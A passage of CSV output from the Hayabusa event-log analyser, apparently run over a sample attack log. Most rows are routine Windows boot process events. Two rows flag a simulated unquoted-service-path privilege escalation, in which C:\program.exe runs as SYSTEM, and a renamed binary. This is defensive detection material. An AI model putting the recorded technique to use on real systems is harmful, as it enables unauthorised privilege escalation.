winlogon.exe | LID: 0x3e7 | PID: 992 | PGUID: 747F3D96-B764-5EA4-0000-0010DEBF0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""dwm.exe"" | Process: C:\Windows\System32\dwm.exe | User: Window Manager\DWM-1 | Parent Cmd: winlogon.exe | LID: 0xbff6 | PID: 1000 | PGUID: 747F3D96-B764-5EA4-0000-001035C00000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1020 | PGUID: 747F3D96-B764-5EA4-0000-00105FC20000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 636 | PGUID: 747F3D96-B764-5EA4-0000-0010EAC90000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1104 | PGUID: 
747F3D96-B764-5EA4-0000-0010A5D20000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 747F3D96-B765-5EA4-0000-001032D70000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1212 | PGUID: 747F3D96-B765-5EA4-0000-001089DD0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1240 | PGUID: 747F3D96-B765-5EA4-0000-0010DCDF0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1308 | PGUID: 
747F3D96-B765-5EA4-0000-00109FE80000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1360 | PGUID: 747F3D96-B765-5EA4-0000-00104FEE0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 | Process: C:\Windows\System32\upfc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1380 | PGUID: 747F3D96-B765-5EA4-0000-00107DF10000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1500 | PGUID: 747F3D96-B765-5EA4-0000-0010EDFC0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 1536 
| PGUID: 747F3D96-B765-5EA4-0000-001055010100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1616 | PGUID: 747F3D96-B765-5EA4-0000-0010550A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1624 | PGUID: 747F3D96-B765-5EA4-0000-00108B0A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1640 | PGUID: 747F3D96-B765-5EA4-0000-0010EA0A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1676 | PGUID: 
747F3D96-B765-5EA4-0000-00102B0F0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1780 | PGUID: 747F3D96-B765-5EA4-0000-001028190100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dxgiadaptercache.exe | Process: C:\Windows\System32\dxgiadaptercache.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1876 | PGUID: 747F3D96-B765-5EA4-0000-0010831F0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1912 | PGUID: 747F3D96-B765-5EA4-0000-00109B240100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1920 | PGUID: 
747F3D96-B765-5EA4-0000-001031250100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1936 | PGUID: 747F3D96-B765-5EA4-0000-0010BE260100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1996 | PGUID: 747F3D96-B765-5EA4-0000-0010572D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1440 | PGUID: 747F3D96-B765-5EA4-0000-00107A380100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | 
LID: 0x3e5 | PID: 1552 | PGUID: 747F3D96-B765-5EA4-0000-00100B390100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2076 | PGUID: 747F3D96-B765-5EA4-0000-0010AA430100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.481 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20200425_221917_750.etl | Process: C:\Windows\System32\svchost.exe | PID: 2056 | PGUID: 747F3D96-B765-5EA4-0000-00106B420100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2204 | PGUID: 747F3D96-B765-5EA4-0000-0010344D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2364 | PGUID: 
747F3D96-B765-5EA4-0000-001016620100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2408 | PGUID: 747F3D96-B766-5EA4-0000-0010C4680100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2476 | PGUID: 747F3D96-B766-5EA4-0000-0010366F0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2488 | PGUID: 747F3D96-B766-5EA4-0000-001019700100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2496 | PGUID: 
747F3D96-B766-5EA4-0000-001046700100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2632 | PGUID: 747F3D96-B766-5EA4-0000-0010A4790100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k utcsvc -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2640 | PGUID: 747F3D96-B766-5EA4-0000-0010067A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2704 | PGUID: 747F3D96-B766-5EA4-0000-0010DE7E0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2736 | PGUID: 
747F3D96-B766-5EA4-0000-0010A7800100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2772 | PGUID: 747F3D96-B766-5EA4-0000-001074830100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2848 | PGUID: 747F3D96-B766-5EA4-0000-0010D4880100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - Potential Unquoted Service Exploit | Cmd: c:\Program Files\vulnsvc\mmm.exe | Process: C:\program.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2856 | PGUID: 747F3D96-B766-5EA4-0000-0010E7880100 | Hash: SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,medium,Evas,Renamed 
Binary,,../hayabusa-rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2876 | PGUID: 747F3D96-B766-5EA4-0000-0010038A0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2900 | PGUID: 747F3D96-B766-5EA4-0000-00104A8D0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3044 | PGUID: 747F3D96-B766-5EA4-0000-0010BAA10100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: sihost.exe | Process: C:\Windows\System32\sihost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | LID: 0x1d39b | PID: 3752 | PGUID: 
747F3D96-B767-5EA4-0000-0010FE2E0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3760 | PGUID: 747F3D96-B767-5EA4-0000-0010D0310200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3820 | PGUID: 747F3D96-B767-5EA4-0000-001097430200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4264 | PGUID: 747F3D96-B768-5EA4-0000-00106FAE0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: winlogon.exe | LID: 0x1d39b | PID: 4536 | PGUID: 
747F3D96-B769-5EA4-0000-00101D9C0300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x1d39b | PID: 4600 | PGUID: 747F3D96-B76A-5EA4-0000-0010EEB50300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC | Process: C:\Windows\System32\svchost.exe 